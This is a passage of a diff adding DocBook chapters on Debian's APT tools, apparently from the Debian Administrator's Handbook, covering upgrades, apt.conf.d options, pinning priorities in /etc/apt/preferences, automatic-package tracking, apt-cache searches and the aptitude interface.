+      option, followed by the name of the
+      distribution you want (for example: <command>apt -t stable
+      upgrade</command>). To avoid specifying this option every time
+      you use <command>apt</command>, you can add
+      <literal>APT::Default-Release "stable";</literal> in the file
+      <filename>/etc/apt/apt.conf.d/local</filename>.</para>
+
+      <indexterm><primary><command>apt full-upgrade</command></primary></indexterm>
+      <indexterm><primary><command>apt dist-upgrade</command></primary></indexterm>
+      <indexterm><primary><command>apt-get dist-upgrade</command></primary></indexterm>
+      <indexterm><primary><command>aptitude dist-upgrade</command></primary></indexterm>
+      <indexterm><primary><command>aptitude full-upgrade</command></primary></indexterm>
+
+      <para>For more important upgrades, such as the change from one major
+      Debian version to the next, you need to use <command>apt
+      full-upgrade</command>. With this instruction,
+      <command>apt</command> will complete the upgrade even if it has to
+      remove some obsolete packages or install new dependencies. This is
+      also the command used by users who work daily with the Debian
+      <emphasis role="distribution">Unstable</emphasis> release and follow its
+      evolution day by day. It is so simple that it hardly needs
+      explanation: APT's reputation is based on this great
+      functionality.</para>
+
+      <para>Unlike <command>apt</command> and <command>aptitude</command>,
+      <command>apt-get</command> doesn't know the
+      <command>full-upgrade</command> command. Instead,
+      you should use <command>apt-get dist-upgrade</command>
+      (”distribution upgrade”), the historical and well-known
+      command that <command>apt</command> and <command>aptitude</command>
+      also accept for the convenience of users who got used to it.
+      </para>
+    </section>
+
+    <section id="sect.apt-config">
+      <title>Configuration Options</title>
+      <indexterm><primary>APT</primary><secondary>configuration</secondary></indexterm>
+      <indexterm><primary><filename>apt.conf.d/</filename></primary></indexterm>
+      <indexterm><primary><filename>/etc/apt/apt.conf.d/</filename></primary></indexterm>
+
+      <para>Besides the configuration elements already mentioned, it is
+      possible to configure certain aspects of APT by adding directives in
+      a file of the <filename>/etc/apt/apt.conf.d/</filename> directory.
+      Remember for instance that it is possible for APT to tell
+      <command>dpkg</command> to ignore file conflict errors by specifying
+      <literal>DPkg::options { "--force-overwrite"; }</literal>.</para>
+
+      <para>If the Web can only be accessed through a proxy, add a line
+      like <literal>Acquire::http::proxy
+      "http://<replaceable>yourproxy</replaceable>:3128"</literal>. For an
+      FTP proxy, write <literal>Acquire::ftp::proxy
+      "ftp://<replaceable>yourproxy</replaceable>"</literal>. To discover
+      more configuration options, read the
+      <citerefentry><refentrytitle>apt.conf</refentrytitle><manvolnum>5</manvolnum></citerefentry>
+      manual page with the <command>man apt.conf</command> command (for
+      details on manual pages, see <xref linkend="sect.manual-pages" />).</para>
+
+      <sidebar id="sidebar.directory.d">
+        <title><emphasis>BACK TO BASICS</emphasis> Directories ending in <filename>.d</filename></title>
+        <indexterm><primary><filename>.d</filename></primary></indexterm>
+
+	<para>Directories with a <filename>.d</filename> suffix are used
+	more and more often. Each directory represents a configuration file
+	which is split over multiple files. In this sense, all of the files
+	in <filename>/etc/apt/apt.conf.d/</filename> are instructions for
+	the configuration of APT. APT includes them in alphabetical order,
+	so that the last ones can modify a configuration element defined in
+	one of the first ones.</para>
+
+	<para>This structure brings some flexibility to the machine
+	administrator and to the package maintainers. Indeed, the
+	administrator can easily modify the configuration of the software
+	by adding a ready-made file in the directory in question without
+	having to change an existing file. Package maintainers use the same
+	approach when they need to adapt the configuration of another
+	software to ensure that it perfectly co-exists with theirs.
+	The Debian policy explicitly forbids modifying
+	configuration files of other packages — only users are allowed to
+	do this. Remember that during a package upgrade, the user gets to
+	choose the version of the configuration file that should be kept
+	when a modification has been detected. Any external modification of
+	the file would trigger that request, which would disturb the
+	administrator, who is sure not to have changed anything.</para>
+
+	<para>Without a <filename>.d</filename> directory, it is impossible
+	for an external package to change the settings of a program without
+	modifying its configuration file. Instead it must invite the user
+	to do it themselves and lists the operations to be done in the file
+	<filename>/usr/share/doc/<replaceable>package</replaceable>/README.Debian</filename>.</para>
+
+	<para>Depending on the application, the <filename>.d</filename>
+	directory is used directly or managed by an external script which
+	will concatenate all the files to create the configuration file
+	itself. It is important to execute the script after any change in
+	that directory so that the most recent modifications are taken into
+	account. In the same way, it is important not to work directly in
+	the configuration file created automatically, since everything
+	would be lost at the next execution of the script. The chosen
+	method (<filename>.d</filename> directory used directly or a file
+	generated from that directory) is usually dictated by implementation
+	constraints, but in both cases the gains in terms of configuration
+	flexibility more than make up for the small complications that they
+	entail. The Exim 4 mail server is an example of the generated file
+	method: it can be configured through several files
+	(<filename>/etc/exim4/conf.d/*</filename>) which are concatenated
+	into <filename>/var/lib/exim4/config.autogenerated</filename> by
+	the <command>update-exim4.conf</command> command.</para>
+      </sidebar>
+    </section>
+    <section id="sect.apt.priorities">
+      <title>Managing Package Priorities</title>
+
+      <para>One of the most important aspects in the configuration of APT
+      is the management of the priorities associated with each package
+      source. For instance, you might want to extend one distribution with
+      one or two newer packages from <emphasis role="distribution">Testing</emphasis>, <emphasis role="distribution">Unstable</emphasis> or <emphasis role="distribution">Experimental</emphasis>. It is possible to assign
+      a priority to each available package (the same package can have
+      several priorities depending on its version or the distribution
+      providing it). These priorities will influence APT's behavior: for
+      each package, it will always select the version with the highest
+      priority (except if this version is older than the installed one and
+      if its priority is less than 1000).</para>
+      <indexterm><primary>APT</primary><secondary><foreignphrase>pinning</foreignphrase></secondary></indexterm>
+      <indexterm><primary>pinning, APT pinning</primary></indexterm>
+      <indexterm><primary>package</primary><secondary>priority</secondary></indexterm>
+      <indexterm><primary>priority</primary><secondary>package priority</secondary></indexterm>
+      <indexterm><primary>APT</primary><secondary>preferences</secondary></indexterm>
+      <indexterm><primary><filename>preferences</filename></primary></indexterm>
+      <indexterm><primary><filename>/etc/apt/preferences</filename></primary></indexterm>
+
+      <para>APT defines several default priorities. Each installed package
+      version has a priority of 100. A non-installed version has a
+      priority of 500 by default, but it can jump to 990 if it is part of
+      the target release (defined with the <literal>-t</literal>
+      command-line option or the <literal>APT::Default-Release</literal>
+      configuration directive).</para>
+
+      <para>You can modify the priorities by adding entries in the
+      <filename>/etc/apt/preferences</filename> file with the names of the
+      affected packages, their version, their origin and their new
+      priority.</para>
+
+      <para>APT will never install an older version of a package (that is,
+      a package whose version number is lower than the one of the currently
+      installed package) except if its priority is higher than 1000. APT
+      will always install the highest priority package which follows this
+      constraint. If two packages have the same priority, APT installs the
+      newest one (whose version number is the highest). If two packages of
+      same version have the same priority but differ in their content, APT
+      installs the version that is not installed (this rule has been
+      created to cover the case of a package update without the increment
+      of the revision number, which is usually required).</para>
+
+      <para>In more concrete terms, a package whose priority is less
+      than 0 will never be installed. A package with a priority ranging
+      between 0 and 100 will only be installed if no other version of the
+      package is already installed. With a priority between 100 and 500,
+      the package will only be installed if there is no other newer version
+      installed or available in another distribution. A package of priority
+      between 501 and 990 will only be installed if there is no newer
+      version installed or available in the target distribution. With a
+      priority between 990 and 1000, the package will be installed except
+      if the installed version is newer. A priority greater than 1000 will
+      always lead to the installation of the package even if it forces APT
+      to downgrade to an older version.</para>
+
+      <para>When APT checks <filename>/etc/apt/preferences</filename>, it
+      first takes into account the most specific entries (often those
+      specifying the concerned package), then the more generic ones
+      (including for example all the packages of a distribution). If
+      several generic entries exist, the first match is used. The available
+      selection criteria include the package's name and the source
+      providing it. Every package source is identified by the information
+      contained in a <filename>Release</filename> file that APT downloads
+      together with the <filename>Packages</filename> files. It
+      specifies the origin (usually “Debian” for the packages of
+      official mirrors, but it can also be a person's or an organization's
+      name for third-party repositories). It also gives the name of the
+      distribution (usually <emphasis role="distribution">Stable</emphasis>, <emphasis role="distribution">Testing</emphasis>, <emphasis role="distribution">Unstable</emphasis> or <emphasis role="distribution">Experimental</emphasis> for the standard
+      distributions provided by Debian) together with its version (for
+      example 9 for Debian <emphasis role="distribution">Stretch</emphasis>). Let's have a look at its
+      syntax through some realistic case studies of this mechanism.</para>
+
+      <sidebar>
+        <title><emphasis>SPECIFIC CASE</emphasis> Priority of <emphasis role="distribution">experimental</emphasis></title>
+        <indexterm><primary><emphasis role="distribution">Experimental</emphasis></primary></indexterm>
+
+	<para>If you listed <emphasis role="distribution">Experimental</emphasis> in your
+	<filename>sources.list</filename> file, the corresponding packages
+	will almost never be installed because their default APT priority
+	is 1. This is of course a specific case, designed to keep users
+	from installing <emphasis role="distribution">Experimental</emphasis> packages by mistake.
+	The packages can only be installed by typing <command>aptitude
+	install <replaceable>package</replaceable>/experimental</command>
+	— users typing this command can only be aware of the risks that
+	they take. It is still possible (though <emphasis>not</emphasis>
+	recommended) to treat packages of <emphasis role="distribution">Experimental</emphasis> like those of other
+	distributions by giving them a priority of 500. This is done with
+	a specific entry in
+	<filename>/etc/apt/preferences</filename>:</para>
+        <informalexample>
+          <programlisting>Package: *
+Pin: release a=experimental
+Pin-Priority: 500
+</programlisting>
+        </informalexample>
+      </sidebar>
+
+      <para>Let's suppose that you only want to use packages from the
+      stable version of Debian. Those provided in other versions should not
+      be installed except if explicitly requested. You could write the
+      following entries in the <filename>/etc/apt/preferences</filename>
+      file:</para>
+      <informalexample>
+        <programlisting>Package: *
+Pin: release a=stable
+Pin-Priority: 900
+
+Package: *
+Pin: release o=Debian
+Pin-Priority: -10
+</programlisting>
+      </informalexample>
+
+      <para><literal>a=stable</literal> defines the name of the selected
+      distribution. <literal>o=Debian</literal> limits the scope to
+      packages whose origin is “Debian”.</para>
+
+      <para>Let's now assume that you have a server with several local
+      programs depending on the version 5.24 of Perl and that you want to
+      ensure that upgrades will not install another version of it. You
+      could use this entry:</para>
+      <informalexample>
+        <programlisting>Package: perl
+Pin: version 5.24*
+Pin-Priority: 1001
+</programlisting>
+      </informalexample>
+
+      <para>The reference documentation for this configuration file is
+      available in the manual page
+      <citerefentry><refentrytitle>apt_preferences</refentrytitle><manvolnum>5</manvolnum></citerefentry>,
+      which you can display with <command>man
+      apt_preferences</command>.</para>
+
+      <sidebar>
+        <title><emphasis>TIP</emphasis> Comments in <filename>/etc/apt/preferences</filename></title>
+        <indexterm><primary><literal>Explanation</literal></primary></indexterm>
+        <indexterm><primary><literal>Pin</literal></primary></indexterm>
+        <indexterm><primary><literal>Pin-Priority</literal></primary></indexterm>
+
+	<para>There is no official syntax to put comments in the
+	<filename>/etc/apt/preferences</filename> file, but some textual
+	descriptions can be provided by putting one or more
+	“<literal>Explanation</literal>” fields at the start of each
+	entry:</para>
+        <informalexample>
+          <programlisting>Explanation: The package xserver-xorg-video-intel provided
+Explanation: in experimental can be used safely
+Package: xserver-xorg-video-intel
+Pin: release a=experimental
+Pin-Priority: 500
+</programlisting>
+        </informalexample>
+      </sidebar>
+    </section>
+    <section id="sect.apt-mix-distros">
+      <title>Working with Several Distributions</title>
+
+      <para><command>apt</command> being such a marvelous tool, it is
+      tempting to pick packages coming from other distributions. For
+      example, after having installed a <emphasis role="distribution">Stable</emphasis> system, you might want to try
+      out a software package available in <emphasis role="distribution">Testing</emphasis> or <emphasis role="distribution">Unstable</emphasis> without diverging too much
+      from the system's initial state.</para>
+
+      <para>Even if you will occasionally encounter problems while mixing
+      packages from different distributions, <command>apt</command>
+      manages such coexistence very well and limits risks very effectively.
+      The best way to proceed is to list all distributions used in
+      <filename>/etc/apt/sources.list</filename> (some people always put
+      the three distributions, but remember that <emphasis role="distribution">Unstable</emphasis> is reserved for experienced
+      users) and to define your reference distribution with the
+      <literal>APT::Default-Release</literal> parameter (see <xref linkend="sect.apt-upgrade" />).</para>
+
+      <para>Let's suppose that <emphasis role="distribution">Stable</emphasis> is your reference distribution
+      but that <emphasis role="distribution">Testing</emphasis> and
+      <emphasis role="distribution">Unstable</emphasis> are also listed in
+      your <filename>sources.list</filename> file. In this case, you can
+      use <command>apt install
+      <replaceable>package</replaceable>/testing</command> to install a
+      package from <emphasis role="distribution">Testing</emphasis>. If the
+      installation fails due to some unsatisfiable dependencies, let it
+      solve those dependencies within <emphasis role="distribution">Testing</emphasis> by adding the <literal>-t
+      testing</literal> parameter. The same obviously applies to <emphasis role="distribution">Unstable</emphasis>.</para>
+
+      <para>In this situation, upgrades (<command>upgrade</command>
+      and <command>full-upgrade</command>) are done within <emphasis role="distribution">Stable</emphasis> except for packages already
+      upgraded to another distribution: those will follow updates
+      available in the other distributions. We will explain this behavior
+      with the help of the default priorities set by APT below. Do not
+      hesitate to use <command>apt-cache policy</command> (see sidebar <xref linkend="sidebar.apt-cache-policy" />) to
+      verify the given priorities.</para>
+
+      <para>Everything centers around the fact that APT only considers
+      packages of higher or equal version than the installed one (assuming
+      that <filename>/etc/apt/preferences</filename> has not been used to
+      force priorities higher than 1000 for some packages).</para>
+
+      <sidebar id="sidebar.apt-cache-policy">
+        <title><emphasis>TIP</emphasis> <command>apt-cache policy</command></title>
+
+	<para>To gain a better understanding of the mechanism of priority,
+	do not hesitate to execute <command>apt-cache policy</command> to
+	display the default priority associated with each package source.
+	You can also use <command>apt-cache policy
+	<replaceable>package</replaceable></command> to display the
+	priorities of all available versions of a given package.</para>
+      </sidebar>
+
+      <para>Let's assume that you have installed version 1 of a first
+      package from <emphasis role="distribution">Stable</emphasis> and that
+      version 2 and 3 are available respectively in <emphasis role="distribution">Testing</emphasis> and <emphasis role="distribution">Unstable</emphasis>. The installed version has a
+      priority of 100 but the version available in <emphasis role="distribution">Stable</emphasis> (the very same) has a priority
+      of 990 (because it is part of the target release). Packages in
+      <emphasis role="distribution">Testing</emphasis> and <emphasis role="distribution">Unstable</emphasis> have a priority of 500 (the
+      default priority of a non-installed version). The winner is thus
+      version 1 with a priority of 990. The package “stays in <emphasis role="distribution">Stable</emphasis>”.</para>
+
+      <para>Let's take the example of another package whose version 2 has
+      been installed from <emphasis role="distribution">Testing</emphasis>.
+      Version 1 is available in <emphasis role="distribution">Stable</emphasis> and version 3 in <emphasis role="distribution">Unstable</emphasis>. Version 1 (of priority 990
+      — thus lower than 1000) is discarded because it is lower than the
+      installed version. This only leaves version 2 and 3, both of
+      priority 500. Faced with this alternative, APT selects the newest
+      version, the one from <emphasis role="distribution">Unstable</emphasis>.If you don't want a package
+      installed from <emphasis role="distribution">Testing</emphasis> to
+      migrate to <emphasis role="distribution">Unstable</emphasis>, you
+      have to assign a priority lower than 500 (490 for example) to
+      packages coming from <emphasis role="distribution">Unstable</emphasis>. You can modify
+      <filename>/etc/apt/preferences</filename> to this effect:</para>
+
+      <programlisting>Package: *
+Pin: release a=unstable
+Pin-Priority: 490
+</programlisting>
+    </section>
+    <section id="sect.automatic-tracking">
+      <title>Tracking Automatically Installed Packages</title>
+
+      <para>One of the essential functionalities of
+      <command>apt</command> is the tracking of packages installed
+      only through dependencies. These packages are called “automatic”,
+      and often include libraries for instance.</para>
+      
+      <para>With this information, when packages are removed, the package
+      managers can compute a list of automatic packages that are
+      no longer needed (because there is no “manually installed” packages
+      depending on them). <command>apt-get autoremove</command> or
+      <command>apt autoremove</command> will get
+      rid of those packages. <command>aptitude</command> does not have
+      this command because it removes them automatically as
+      soon as they are identified.
+      In all cases, the tools display a clear message listing the affected
+      packages.</para>
+
+      <indexterm><primary><command>apt-mark auto</command></primary></indexterm>
+      <indexterm><primary><command>apt-mark manual</command></primary></indexterm>
+      <indexterm><primary><command>aptitude markauto</command></primary></indexterm>
+      <indexterm><primary><command>aptitude unmarkauto</command></primary></indexterm>
+      <para>It is a good habit to mark as automatic any package that you
+      don't need directly so that they are automatically removed when they
+      aren't necessary anymore. <command>apt-mark auto
+      <replaceable>package</replaceable></command> will mark the given
+      package as automatic whereas <command>apt-mark manual
+      <replaceable>package</replaceable></command> does the
+      opposite. <command>aptitude markauto</command> and
+      <command>aptitude unmarkauto</command> work in the same way
+      although they offer more features for marking many packages
+      at once (see <xref linkend="sect.aptitude" />). The console-based
+      interactive interface of <command>aptitude</command> also
+      makes it easy to review the “automatic flag” on many packages.</para>
+
+      <indexterm><primary><command>aptitude why</command></primary></indexterm>
+      <para>People might want to know why an automatically installed
+      package is present on the system. To get this information from the
+      command line, you can use <command>aptitude why
+        <replaceable>package</replaceable></command>
+      (<command>apt</command> and <command>apt-get</command> have no
+      similar feature):</para>
+
+      <screen><computeroutput>$ </computeroutput><userinput>aptitude why python-debian
+</userinput><computeroutput>i   aptitude         Recommends apt-xapian-index         
+i A apt-xapian-index Depends    python-debian (&gt;= 0.1.15)
+</computeroutput></screen>
+
+      <sidebar>
+	<title><emphasis>ALTERNATIVE</emphasis> <command>deborphan</command> and <command>debfoster</command></title>
+
+	<indexterm><primary><command>deborphan</command></primary></indexterm>
+	<indexterm><primary><command>debfoster</command></primary></indexterm>
+        <para>In days where <command>apt</command>,
+        <command>apt-get</command> and <command>aptitude</command> were
+        not able to track automatic packages, there were two utilities
+	producing lists of unnecessary packages:
+	<command>deborphan</command> and
+	<command>debfoster</command>.</para>
+
+	<para><command>deborphan</command> is the most rudimentary of
+	both. It simply scans the <literal>libs</literal> and
+	<literal>oldlibs</literal> sections (in the absence of
+	supplementary instructions) looking for the packages that are
+	currently installed and that no other package depends on. The
+	resulting list can then serve as a basis to remove unneeded
+	packages.</para>
+
+	<para><command>debfoster</command> has a more elaborate approach,
+	very similar to APT's one: it maintains a
+	list of packages that have been explicitly installed, and
+	remembers what packages are really required between each
+	invocation. If new packages appear on the system and if
+	<command>debfoster</command> doesn't know them as required
+	packages, they will be shown on the screen together with a list
+	of their dependencies. The program then offers a choice: remove
+	the package (possibly together with those that depend on it),
+	mark it as explicitly required, or ignore it temporarily.</para>
+      </sidebar>
+    </section>
+  </section>
+
+  <section id="sect.apt-cache">
+    <title>The <command>apt-cache</command> Command</title>
+    <indexterm><primary><command>apt-cache</command></primary></indexterm>
+    <indexterm><primary>APT</primary><secondary>package search</secondary></indexterm>
+    <indexterm><primary>APT</primary><secondary>header display</secondary></indexterm>
+    <indexterm><primary>search of packages</primary></indexterm>
+    <indexterm><primary>package</primary><secondary>search</secondary></indexterm>
+
+    <para>The <command>apt-cache</command> command can display much of the
+    information stored in APT's internal database. This information is a
+    sort of cache since it is gathered from the different sources listed in
+    the <filename>sources.list</filename> file. This happens during the
+    <command>apt update</command> operation.</para>
+
+    <sidebar id="sidebar.cache">
+      <title><emphasis>VOCABULARY</emphasis> Cache</title>
+
+      <para>A cache is a temporary storage system used to speed up frequent
+      data access when the usual access method is expensive
+      (performance-wise). This concept can be applied in numerous
+      situations and at different scales, from the core of microprocessors
+      up to high-end storage systems.</para>
+
+      <para>In the case of APT, the reference <filename>Packages</filename>
+      files are those located on Debian mirrors. That said, it would be
+      very ineffective to go through the network for every search that we
+      might want to do in the database of available packages. That is why
+      APT stores a copy of those files (in
+      <filename>/var/lib/apt/lists/</filename>) and searches are done
+      within those local files. Similarly,
+      <filename>/var/cache/apt/archives/</filename> contains a cache of
+      already downloaded packages to avoid downloading them again if you
+      need to reinstall them after a removal.</para>
+    </sidebar>
+
+    <indexterm><primary><command>apt show</command></primary></indexterm>
+    <indexterm><primary><command>apt search</command></primary></indexterm>
+    <indexterm><primary><command>apt-cache show</command></primary></indexterm>
+    <indexterm><primary><command>apt-cache search</command></primary></indexterm>
+    <indexterm><primary><command>aptitude show</command></primary></indexterm>
+    <indexterm><primary><command>aptitude search</command></primary></indexterm>
+    <para>The <command>apt-cache</command> command can do keyword-based
+    package searches with <command>apt-cache search
+    <replaceable>keyword</replaceable></command>. It can also display the
+    headers of the package's available versions with <command>apt-cache
+    show <replaceable>package</replaceable></command>. This command
+    provides the package's description, its dependencies, the name of its
+    maintainer, etc. Note that <command>apt search</command>, <command>apt
+    show</command>, <command>aptitude search</command>,
+    <command>aptitude show</command> work in the same way.
+    </para>
+
+    <sidebar>
+      <title><emphasis>ALTERNATIVE</emphasis> <command>axi-cache</command></title>
+      <indexterm><primary><command>axi-cache</command></primary></indexterm>
+      <indexterm><primary><emphasis role="pkg">apt-xapian-index</emphasis></primary></indexterm>
+
+      <para><command>apt-cache search</command> is a very rudimentary tool,
+      basically implementing <command>grep</command> on package's
+      descriptions. It often returns too many results or none at all when
+      you include too many keywords.</para>
+
+      <para><command>axi-cache search <replaceable>term</replaceable></command>,
+      on the other hand, provides better results, sorted by relevancy. It
+      uses the <emphasis>Xapian</emphasis> search engine and is part of
+      the <emphasis role="pkg">apt-xapian-index</emphasis> package whichs indexes
+      all package information (and more, like the <filename>.desktop</filename>
+      files from all Debian packages). It knows about tags
+      (see sidebar <xref linkend="sidebar.debtags" />) and returns results in a matter
+      of milliseconds.</para>
+
+      <screen>$ <userinput>axi-cache search package use::searching</userinput>
+100 results found.
+Results 1-20:
+100% packagesearch - GUI for searching packages and viewing package information
+100% apt-utils - package management related utility programs
+99% dpkg-awk - Gawk script to parse /var/lib/dpkg/{status,available} and Packages
+98% migemo - Transitional package for migemo
+95% apt-file - search for files within Debian packages (command-line interface)
+[...]
+79% apt-xapian-index - maintenance and search tools for a Xapian index of Debian packages
+More terms: paquets debian pour debtags recherche gift gnuift
+More tags: suite::debian works-with::software:package role::program admin::package-management interface::commandline scope::utility field::biology:bioinformatics
+`axi-cache more' will give more results
+      </screen>
+    </sidebar>
+
+    <indexterm><primary><command>apt-cache policy</command></primary></indexterm>
+    <indexterm><primary><command>apt-cache dumpavail</command></primary></indexterm>
+    <indexterm><primary><command>apt-cache pkgnames</command></primary></indexterm>
+    <para>Some features are more rarely used. For instance,
+    <command>apt-cache policy</command> displays the priorities of package
+    sources as well as those of individual packages. Another example is
+    <command>apt-cache dumpavail</command> which displays the headers of
+    all available versions of all packages. <command>apt-cache
+    pkgnames</command> displays the list of all the packages which appear
+    at least once in the cache.</para>
+  </section>
+
+  <section id="sect.apt-frontends">
+    <title>Frontends: <command>aptitude</command>, <command>synaptic</command></title>
+    <indexterm><primary><command>aptitude</command></primary></indexterm>
+    <indexterm><primary><command>synaptic</command></primary></indexterm>
+    <indexterm><primary>APT</primary><secondary>interfaces</secondary></indexterm>
+
+    <para>APT is a C++ program whose code mainly resides in the
+    <command>libapt-pkg</command> shared library. Using a shared library
+    facilitates the creation of user interfaces (front-ends), since the
+    code contained in the library can easily be reused. Historically,
+    <command>apt-get</command> was only designed as a test front-end for
+    <command>libapt-pkg</command> but its success tends to obscure this
+    fact.</para>
+    <section id="sect.aptitude">
+      <title><command>aptitude</command></title>
+
+      <para><command>aptitude</command> is an interactive program that can
+      be used in semi-graphical mode on the console. You can browse the
+      list of installed and available packages, look up all the available
+      information, and select packages to install or remove. The program is
+      designed specifically to be used by administrators, so that its
+      default behaviors are much more intelligent than
+      <command>apt-get</command>'s, and its interface much easier to
+      understand.</para>
+
+      <figure>
+        <title>The <command>aptitude</command> package manager</title>
+        <mediaobject>
+          <imageobject>
+            <imagedata fileref="images/aptitude.png" scalefit="1" width="75%" />
+          </imageobject>
+        </mediaobject>
+      </figure>
+
+      <para>When it starts, <command>aptitude</command> shows a list of
+      packages sorted by state (installed, non-installed, or installed but
+      not available on the mirrors — other sections display tasks,
+      virtual packages, and new packages that appeared recently on
+      mirrors). To facilitate thematic browsing, other views are available.
+      In all cases, <command>aptitude</command> displays a list combining
+      categories and packages on the screen. Categories are organized
+      through a tree structure, whose branches can respectively be unfolded
+      or closed with the <keycombo><keycap>Enter</keycap></keycombo>,
+      <keycombo><keycap>[</keycap></keycombo> and
+      <keycombo><keycap>]</keycap></keycombo> keys.
+      <keycombo><keycap>+</keycap></keycombo> should be used to mark a
+      package for installation, <keycombo><keycap>-</keycap></keycombo> to
+      mark it for removal and <keycombo><keycap>_</keycap></keycombo> to
+      purge it (note that these keys can also be used for categories, in
+      which case the corresponding actions will be applied to all the
+      packages of the category). <keycombo><keycap>u</keycap></keycombo>
+      updates the lists of available packages and <keycombo action="simul"><keycap>Shift</keycap><keycap>u</keycap></keycombo>
+      prepares a global system upgrade.
+      <keycombo><keycap>g</keycap></keycombo> switches to a summary view of
+      the requested changes (and typing
+      <keycombo><keycap>g</keycap></keycombo> again will apply the
+      changes), and <keycombo><keycap>q</keycap></keycombo> quits the
+      current view. If you are in the initial view, this will effectively
+      close <command>aptitude</command>.</para>
+
+      <sidebar>
+        <title><emphasis>DOCUMENTATION</emphasis> <command>aptitude</command></title>
+
+	<para>This section does not cover the finer details of using
+	<command>aptitude</command>, it rather focuses on giving you a
+	survival kit to use it. <command>aptitude</command> is rather well
+	documented and we advise you to use its complete manual available
+        in the <emphasis role="pkg">aptitude-doc-en</emphasis> package
+        (see <filename>/usr/share/doc/aptitude/html/en/index.html</filename>).
+	</para>
+      </sidebar>
+
+      <para>To search for a package, you can type
+      <keycombo><keycap>/</keycap></keycombo> followed by a search pattern.
+      This pattern matches the name of the package, but can also be applied
+      to the description (if preceded by <literal>~d</literal>), to the
+      section (with <literal>~s</literal>) or to other characteristics
+      detailed in the documentation. The same patterns can filter the list
+      of displayed packages: type the
+      <keycombo><keycap>l</keycap></keycombo> key (as in
+      <foreignphrase>limit</foreignphrase>) and enter the pattern.</para>
+
+      <para>Managing the “automatic flag” of Debian packages (see <xref linkend="sect.automatic-tracking" />) is a breeze with
+      <command>aptitude</command>. It is possible to browse the list of
+      installed packages and mark packages as automatic with <keycombo action="simul"><keycap>Shift</keycap> <keycap>m</keycap></keycombo>
+      or to remove the mark with the
+      <keycombo><keycap>m</keycap></keycombo> key. “Automatic packages”
+      are displayed with an “A” in the list of packages. This feature also
+      offers a simple way to visualize the packages in use on a machine,
+      without all the libraries and dependencies that you don't really
+      care about. The related pattern that can be used with
+      <keycombo><keycap>l</keycap></keycombo> (to activate the filter
+      mode) is <literal>~i!~M</literal>. It specifies that you only want
+      to see installed packages (<literal>~i</literal>) not marked as
+      automatic (<literal>!~M</literal>).</para> 
+      
+      <sidebar>
+	<title><emphasis>TOOL</emphasis> Using <command>aptitude</command> on the command-line interface</title>
+
+	<para>Most of <command>aptitude</command>'s features are
+	accessible via the interactive interface as well as via
+	command-lines. These command-lines will seem familiar to regular
+	users of <command>apt-get</command> and
+	<command>apt-cache</command>.</para>
+
+	<para>The advanced features of <command>aptitude</command> are
+	also available on the command-line. You can use the same package
+	search patterns as in the interactive version. For example, if you
+	want to cleanup the list of “manually installed” packages, and if
+	you know that none of the locally installed programs require any
+	particular libraries or Perl modules, you can mark the
+	corresponding packages as automatic with a single command:</para>
+
+	<screen><computeroutput># </computeroutput><userinput>aptitude markauto '~slibs|~sperl'</userinput>
+</screen>
+
+	<para>Here, you can clearly see the power of the search pattern
+	system of <command>aptitude</command>, which enables the instant
+	selection of all the packages in the <literal>libs</literal> and
+	<literal>perl</literal> sections.</para>
+
+	<para>Beware, if some packages are marked as automatic and if no
+	other package depends on them, they will be removed immediately
+	(after a confirmation request).</para>
+      </sidebar>
+
+      <section>
+        <title>Managing Recommendations, Suggestions and Tasks</title>
+
+	<para>Another interesting feature of <command>aptitude</command> is
+	the fact that it respects recommendations between packages while
+	still giving users the choice not to install them on a case by case
+	basis. For example, the <emphasis role="pkg">gnome</emphasis> package recommends
+	<emphasis role="pkg">brasero</emphasis> (among others).
+	When you select the former for installation, the latter will also
+	be selected (and marked as automatic if not already installed on
+	the system). Typing <keycombo><keycap>g</keycap></keycombo> will
+	make it obvious: <emphasis role="pkg">brasero</emphasis> appears on the summary
+	screen of pending actions in the list of packages installed
+	automatically to satisfy dependencies. However, you can decide not
+	to install it by deselecting it before confirming the
+	operations.</para>
+
+	<para>Note that this recommendation tracking feature does not apply
+	to upgrades. For instance, if a new version of <emphasis role="pkg">gnome</emphasis> recommends a
+	package that it did not recommend formerly, the package won't be
+	marked for installation. However, it will be listed on the upgrade
+	screen so that the administrator can still select it for
+	installation.</para>
+
+	<para>Suggestions between packages are also taken into account, but
+	in a manner adapted to their specific status. For example, since
+	<emphasis role="pkg">gnome</emphasis> suggests
+	<emphasis role="pkg">empathy</emphasis>, the latter will be
+	displayed on the summary screen of pending actions (in the section
+	of packages suggested by other packages). This way, it is visible
+	and the administrator can decide whether to take the suggestion
+	into account or not. Since it is only a suggestion and not a
+	dependency or a recommendation, the package will not be selected
+	automatically — its selection requires a manual intervention from
+	the user (thus, the package will not be marked as
+	automatic).</para>
+
+	<para>In the same spirit, remember that <command>aptitude</command>
+	makes intelligent use of the concept of task. Since tasks are
+	displayed as categories in the screens of packages lists, you can
+	either select a full task for installation or removal, or browse
+	the list of packages included in the task to select a smaller
+	subset.</para>
+      </section>
+      <section>
+        <title>Better Solver Algorithms</title>
+
+	<para>To conclude this section, let's note that
+	<command>aptitude</command> has more elaborate algorithms compared
+	to <command>apt-get</command> when it comes to resolving difficult
+	situations. When a set of actions is requested and when these
+	combined actions would lead to an incoherent system,
+	<command>aptitude</command> evaluates several possible scenarios
+	and presents them in order of decreasing relevance. However, these
+	algorithms are not failproof. Fortunately there is always the
+	possibility to manually select the actions to perform. When the
+	currently selected actions lead to contradictions, the upper part
+	of the screen indicates a number of “broken” packages (and you
+	can directly navigate to those packages by pressing
+	<keycombo><keycap>b</keycap></keycombo>). It is then possible to
+	manually build a solution for the problems found. In particular,
+	you can get access to the different available versions by simply
+	selecting the package with
+	<keycombo><keycap>Enter</keycap></keycombo>. If the selection of
+	one of these versions solves the problem, you should not hesitate
+	to use the function. When the number of broken packages gets down
+	to zero, you can safely go to the summary screen of pending actions
+	for a last check before you apply them.</para>
+
+        <sidebar>
+          <title><emphasis>NOTE</emphasis> <command>aptitude</command>'s log</title>
+
+	  <para>Like <command>dpkg</command>, <command>aptitude</command>
+	  keeps a trace of executed actions in its logfile
+	  (<filename>/var/log/aptitude</filename>). However, since both
+	  commands work at a very different level, you cannot find the same
+	  information in their respective logfiles. While
+	  <command>dpkg</command> logs all the operations executed on
+	  individual packages step by step, <command>aptitude</command>
+	  gives a broader view of high-level operations like a system-wide
+	  upgrade.</para>
+
+	  <para>Beware, this logfile only contains a summary of operations
+	  performed by <command>aptitude</command>. If other front-ends (or
+	  even <command>dpkg</command> itself) are occasionally used, then
+	  <command>aptitude</command>'s log will only contain a partial
+	  view of the operations, so you can't rely on it to build a
+	  trustworthy history of the system.</para>
+        </sidebar>
+      </section>
